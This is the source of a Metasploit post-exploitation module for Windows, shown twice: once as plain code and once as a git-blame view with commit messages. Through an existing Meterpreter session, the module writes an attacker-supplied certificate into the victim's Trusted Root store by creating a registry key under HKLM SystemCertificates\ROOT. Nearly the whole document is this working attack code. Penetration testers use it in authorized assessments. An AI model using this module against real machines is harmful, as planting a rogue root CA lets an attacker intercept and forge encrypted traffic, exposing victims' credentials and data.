metasploit-framework/modules/post/windows/manage/inject_ca.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Post

	def initialize(info={})
		super(update_info(info,
			'Name'          => 'Windows Manage Certificate Authority Injection',
			'Description'   => %q{
				This module allows the attacker to insert an arbitrary CA certificate
				into the victim's Trusted Root store.
			},
			'License'       => BSD_LICENSE,
			'Author'        => [ 'vt <nick.freeman[at]security-assessment.com>'],
			'Platform'      => [ 'win' ],
			'SessionTypes'  => [ 'meterpreter' ]
		))

		register_options(
			[
				OptString.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])
			], self.class)
	end

	def run
		certfile = datastore['CAFILE']

		# Check file path
		begin
			::File.stat(certfile)
		rescue
			print_error("CAFILE not found")
			return
		end

		cert = ''

		# Load the file
		f = ::File.open(certfile, 'rb')
		cert = f.read(f.stat.size)
		f.close

		loadedcert = OpenSSL::X509::Certificate.new(cert)
		certmd5    = Digest::MD5.hexdigest(loadedcert.to_der).scan(/../)
		certsha1   = Digest::SHA1.hexdigest(loadedcert.to_der).scan(/../)
		cskiray    = loadedcert.extensions[0].value.gsub(/:/,'').scan(/../)

		derLength = loadedcert.to_der.length.to_s(16)
		if (derLength.length < 4)
			derLength = "0#{derLength}"
		end

		derRay = derLength.scan(/../)
		hexDerLength = [ derRay[1], derRay[0] ]

		certder = loadedcert.to_der.each_byte.collect {|val| "%02X" % val}

		bblob  = [ "04", "00", "00", "00", "01", "00", "00", "00", "10", "00", "00", "00" ]
		bblob += certmd5
		bblob += [ "03", "00", "00", "00", "01", "00", "00", "00", "14", "00", "00", "00" ]
		bblob += certsha1
		bblob += [ "14", "00", "00", "00", "01", "00", "00", "00", "14", "00", "00", "00" ]
		bblob += cskiray
		bblob += [ "20", "00", "00", "00", "01", "00", "00", "00" ]
		bblob += hexDerLength
		bblob += [ "00", "00" ]
		bblob += certder

		blob = bblob.map(&:hex).pack("C*")

		cleancertsha1 = certsha1.to_s.gsub(/[\s\[\\\"\]]/,'').gsub(/,/,'').upcase
		catree = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates"
		entire_key = "#{catree}\\#{cleancertsha1}"
		root_key, base_key = client.sys.registry.splitkey(entire_key)

		# Perform the registry operations

		# Ensure the cert doesn't already exist
		begin
			open_key = nil
			open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + 0x0000)
			values = open_key.enum_value
			if (values.length > 0)
				print_error("Key already exists!")
				return
			end
		rescue
			open_key = nil
			open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + 0x0000)
			print_status("Successfully created key: #{entire_key}")

			open_key.set_value('Blob', REG_BINARY, blob)
			print_good("CA inserted!")
		end
	end

end
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Post`

			`def initialize(info={})`
			`super(update_info(info,`
Correct more post modules for naming style consistency 2012-02-20 19:49:23 +00:00			`'Name' => 'Windows Manage Certificate Authority Injection',`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`'Description' => %q{`
			`This module allows the attacker to insert an arbitrary CA certificate`
			`into the victim's Trusted Root store.`
			`},`
			`'License' => BSD_LICENSE,`
			`'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],`
Platform windows cleanup Change all Platform 'windows' to 'win', as it internally is an alias anyway and only causes unnecessary confusion to have two platform names that mean the same. 2012-10-23 18:33:01 +00:00			`'Platform' => [ 'win' ],`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`'SessionTypes' => [ 'meterpreter' ]`
			`))`

			`register_options(`
			`[`
			`OptString.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])`
			`], self.class)`
			`end`

			`def run`
			`certfile = datastore['CAFILE']`

			`# Check file path`
			`begin`
			`::File.stat(certfile)`
			`rescue`
			`print_error("CAFILE not found")`
			`return`
			`end`

			`cert = ''`

			`# Load the file`
			`f = ::File.open(certfile, 'rb')`
			`cert = f.read(f.stat.size)`
			`f.close`

			`loadedcert = OpenSSL::X509::Certificate.new(cert)`
			`certmd5 = Digest::MD5.hexdigest(loadedcert.to_der).scan(/../)`
			`certsha1 = Digest::SHA1.hexdigest(loadedcert.to_der).scan(/../)`
			`cskiray = loadedcert.extensions[0].value.gsub(/:/,'').scan(/../)`

			`derLength = loadedcert.to_der.length.to_s(16)`
			`if (derLength.length < 4)`
			`derLength = "0#{derLength}"`
			`end`

			`derRay = derLength.scan(/../)`
			`hexDerLength = [ derRay[1], derRay[0] ]`

			`certder = loadedcert.to_der.each_byte.collect {\|val\| "%02X" % val}`

			`bblob = [ "04", "00", "00", "00", "01", "00", "00", "00", "10", "00", "00", "00" ]`
			`bblob += certmd5`
			`bblob += [ "03", "00", "00", "00", "01", "00", "00", "00", "14", "00", "00", "00" ]`
			`bblob += certsha1`
			`bblob += [ "14", "00", "00", "00", "01", "00", "00", "00", "14", "00", "00", "00" ]`
			`bblob += cskiray`
			`bblob += [ "20", "00", "00", "00", "01", "00", "00", "00" ]`
			`bblob += hexDerLength`
			`bblob += [ "00", "00" ]`
			`bblob += certder`

			`blob = bblob.map(&:hex).pack("C*")`

			`cleancertsha1 = certsha1.to_s.gsub(/[\s\[\\\"\]]/,'').gsub(/,/,'').upcase`
			`catree = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates"`
			`entire_key = "#{catree}\\#{cleancertsha1}"`
			`root_key, base_key = client.sys.registry.splitkey(entire_key)`

			`# Perform the registry operations`

			`# Ensure the cert doesn't already exist`
			`begin`
			`open_key = nil`
			`open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + 0x0000)`
			`values = open_key.enum_value`
			`if (values.length > 0)`
			`print_error("Key already exists!")`
			`return`
			`end`
			`rescue`
			`open_key = nil`
			`open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + 0x0000)`
			`print_status("Successfully created key: #{entire_key}")`

			`open_key.set_value('Blob', REG_BINARY, blob)`
			`print_good("CA inserted!")`
			`end`
			`end`

			`end`